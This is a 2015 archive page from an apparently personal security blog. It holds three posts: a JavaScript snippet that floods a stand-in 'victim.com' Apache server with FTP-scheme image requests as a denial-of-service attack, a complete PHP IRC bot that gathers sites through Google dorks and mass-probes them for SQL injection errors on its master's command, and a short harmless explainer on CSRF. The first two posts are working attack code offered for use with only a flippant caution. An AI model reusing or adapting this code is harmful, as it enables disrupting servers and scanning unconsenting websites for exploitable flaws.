Monthly Archives: August 2015

Javascript apache ddos

Posted on by
Reply

Something quick to share with you before I forget it 🙂

<html><body>
<script>
       for (var i = 0; i < 100; i++) {
             var img = new Image();
             var url = 'ftp://victim.com:80/?'+i;
             img.src = url;
       }
</script>
</body></html>

I use ftp because http has a limit of 6 simultaneous connections on most browsers, on the other hand ftp has no limit to the day I write this post.

Be sane on how you use it!!!

(Original attack demonstration on BlackHat 2013, Las Vegas)

IRC Client – Website Vulnerability scanner

Posted on by
Reply

Hey guys,

This script could only be used as template to create a PHP-based IRC Client/Bot, its vulnerability scanning functions are now useless.

This one comes from the Dark Ages of GRnet, enjoy 🙂

In any case I do not have any responsibility on how the script runs and what errors might pop up on your computer.

<?php

set_time_limit(0);

/**
 * @author Atlantean.
 */

//########################INFORMATION##################################

$server = "global.irc.gr";
$port = 6667;
$me = "php_scanner";
$channel = "#scripting";
$identify = "id";
$master = array("Atlantean");

//EDIT THIS
$max_results = 500; // maximum Google results //
$threads = 10; //URLS TO test IN the same time!!

//#####################################################################

$search = array("mysql_num_rows()", "mysql_fetch_rows()", "main(", "extract()",
    "mysql_result()", "Syntax Error", "You Have An error", "mysql error",
    "SQL ERROR", "Warning: ");
//###############################SERVER WRITE##########################

$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!socket_connect($socket, $server, $port))
{
    echo "\n[-]Unable To connect...\n\n\n";
    exit;
}

socket_write($socket, "USER php 127.0.0.1 PHP :PHP Bot\nNICK $me\nJOIN :$channel\n");


//###############################Encode The Dork#############################

function encodeDork($s)
{
    $tmp = "";
    for ($i = 0; $i < strlen($s); $i++)
    {
        $tmp .= "&#" . hexdec(bin2hex($s[$i])) . ";";
    }
    return urlencode($tmp);
}

//###############################cURL MULTI THREAD#############################

function ExecHandle(&$curlHandle)
{
    $flag = null;
    do
    {
        curl_multi_exec($curlHandle, $flag);
    } while ($flag > 0);
}


while ($read = socket_read($socket, 2048))
{
    $cmd = explode(" ", $read);
    $nick = explode(':', $cmd[0]);
    $nick = explode('!', $nick[1]);
    $nick = strtolower($nick[0]);

    switch ($cmd[1])
    {
        case "KICK":
            if ($cmd[3] == $me)
            {
                socket_write($socket, "\nJOIN :" . $channel . "\n");
            }
            break;
        case "PRIVMSG":
            if (in_array($nick, $master))
            {
                switch (str_replace(array(chr(10), chr(13)), '', $cmd[3]))
                {
                    case ":!join":
                        socket_write($socket, "\nJOIN :" . $cmd[4] . "\n");
                        break;
                    case ":!exit":
                        exit(socket_write($socket, "\nQUIT :Connection Lost\n"));
                        break;
                    case ":!part":
                        socket_write($socket, "\nPART :" . $cmd[4] . "\n");
                        break;
                    case ":!sql":
                        if (!isset($cmd[4]))
                        {
                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                                "12[-] Enter Dork!\r\n");
                        } else
                        {
                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                                "12[+] SQL Vulnerabilty Scan Started ...\nPRIVMSG $channel :" . chr(3) . "4$nick " .
                                chr(3) . "12[+] Dork : $cmd[4] \r\n");

                            $vuln_array = array();

                            $google = "http://www.google.com/search?q=" . encodeDork($cmd[4]) . "&start=0";

                            $ch = curl_init($google);
                            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                            curl_setopt($ch, CURLOPT_HEADER, 0);
                            $ret = curl_exec($ch);
                            curl_close($ch);

                            if (stristr($ret, '302 Moved') != false)
                            {
                                socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[-] Banned From Google!! \r\n");
                                break;
                            }

                            preg_match_all("/of( about)* <b>([\d,]+)<\/b>/", $ret, $max);
                            $max = str_replace(",", "", $max[2][0]);

                            $max = $max > $max_results ? $max_results : $max;
                            $i = 0;

                            while ($i < $max)
                            {

                                $ch = curl_init("http://www.google.com/search?q=" . encodeDork($cmd[4]) . "&start=" . $i);
                                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                                curl_setopt($ch, CURLOPT_HEADER, 0);
                                $ret = curl_exec($ch);

                                preg_match_all("/<h3 class=r><a href=\"(.*?)\"/", $ret, $links);

                                if (@$links[1])
                                {
                                    foreach ($links[1] as $l)
                                    {
                                        if (strpos($l, '=') != false)
                                        {
                                            $url = explode('=', $l);
                                            $url = $url[0] . "='";
                                            if (!in_array($url, $vuln_array))
                                            {
                                                array_push($vuln_array, $url);
                                            }
                                        }
                                    }
                                }

                                curl_close($ch);
                                $i = $max > 10 ? $i += 10 : $i++;
                            }

                            array_unique($vuln_array);
                            sort($vuln_array);

                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[+] Got " . count($vuln_array) . " Valid URLs! Injection Started...\r\n");

                            $p = 0;
                            $o = $threads;

                            $curlHandle = curl_multi_init();

                            do
                            {

                                $tmp = count($vuln_array);

                                for ($i = 0; $i < $threads && $i < $tmp; $i++)
                                {
                                    $cURL[$i] = curl_init($vuln_array[$i]);
                                    curl_setopt($cURL[$i], CURLOPT_URL, $vuln_array[$i]);
                                    curl_setopt($cURL[$i], CURLOPT_HEADER, 0);
                                    curl_setopt($cURL[$i], CURLOPT_RETURNTRANSFER, true);
                                    curl_multi_add_handle($curlHandle, $cURL[$i]);
                                }

                                ExecHandle($curlHandle);

                                for ($i = 0; $i < $threads && $i < $tmp; $i++)
                                {
                                    $source[$i] = curl_multi_getcontent($cURL[$i]);
                                }


                                for ($i = 0; $i < $threads && $i < $tmp; $i++)
                                {
                                    foreach ($search as $error)
                                    {
                                        if (stristr($source[$i], $error) != false)
                                        {
                                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                                                "12[+] Possible Bug Found: $vuln_array[$i]\n");
                                            $p++;
                                            break;
                                        }
                                    }
                                }


                                for ($i = 0; $i < $threads && $i < $tmp; $i++)
                                {
                                    curl_multi_remove_handle($curlHandle, $cURL[$i]);
                                    unset($vuln_array[$i]);
                                }
                                sort($vuln_array);

                                socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                                    "12[+] Scanned $o...\r\n");
                                $o += $threads;

                                unset($source);
                                unset($cURL);

                            } while (count($vuln_array) > 0);

                            curl_multi_close($curlHandle);

                            unset($vuln_array);
                            unset($source);
                            unset($cURL);

                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[+] Done. $p Bugs Found.\r\n");
                        }
                        break;
                }
            }
            break;
    }

    if ($cmd[0] == "PING")
    {
        socket_write($socket, "PONG " . $cmd[1] . "\n");
    }
}
socket_close($socket);
?>

CSRF attack

Posted on by
Reply

It’s been long since the last time I blogged but some things I took on were very time-consumptive, today we’ll talk about CSRF.

CSRF? What is that?

CSRF stands for cross-site request forgery, and it almost always leads to bad, nasty things. It can damage your bank account balance, it acts on your behalf on your website activities without your consent or you even knowing about it until it’s very late.

However, if a website has taken precautions about this type of attack such as CSRF one-time tokens, it’s renders the attack completely harmless because the web server will not accept the requests sent by 3rd parties.

For more details one good article I spotted is on: https://www.acunetix.com/websitesecurity/csrf-attacks/

Aimilios